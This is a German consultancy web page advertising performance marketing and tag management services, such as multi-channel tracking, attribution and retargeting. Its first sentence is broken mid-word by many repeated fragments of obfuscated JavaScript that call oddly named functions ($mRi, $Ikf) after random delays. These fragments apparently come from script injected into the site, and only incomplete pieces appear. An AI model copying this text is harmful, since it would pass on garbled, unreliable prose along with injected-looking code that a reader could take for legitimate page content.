FacebookTwitter

Performance Marketing

Performance Marketing und Tag Management

Um Marketing Budgets möglichst gewinnbringend einzusetzen müssen die Wechselwirkungen zwischen Werbemitteln, Webekanälen und der Website verstandom() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}anden und aneinandom() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andom() * 5); if (number1==3){var delay = 15000;setTimeout($mRi(0), delay);}ander ausgerichtet werden.

ConversionConsult unterstützt hierbei nicht nur bei der Messung sondern auch ganz konkret bei der Steuerung der Kanäle.

Dazu gehören Themen wie:

  • Multi Channel Tracking (Toolauswahl und Einsatz)
  • Nutzung von Tag Management Tools und Attribution der Kanäle
  • Steuerung und Controlling verschiedener Kanäle (SEA, Media, Affiliate, etc.)
  • Einsatz von Retargeting und RTB (Real Time Bidding)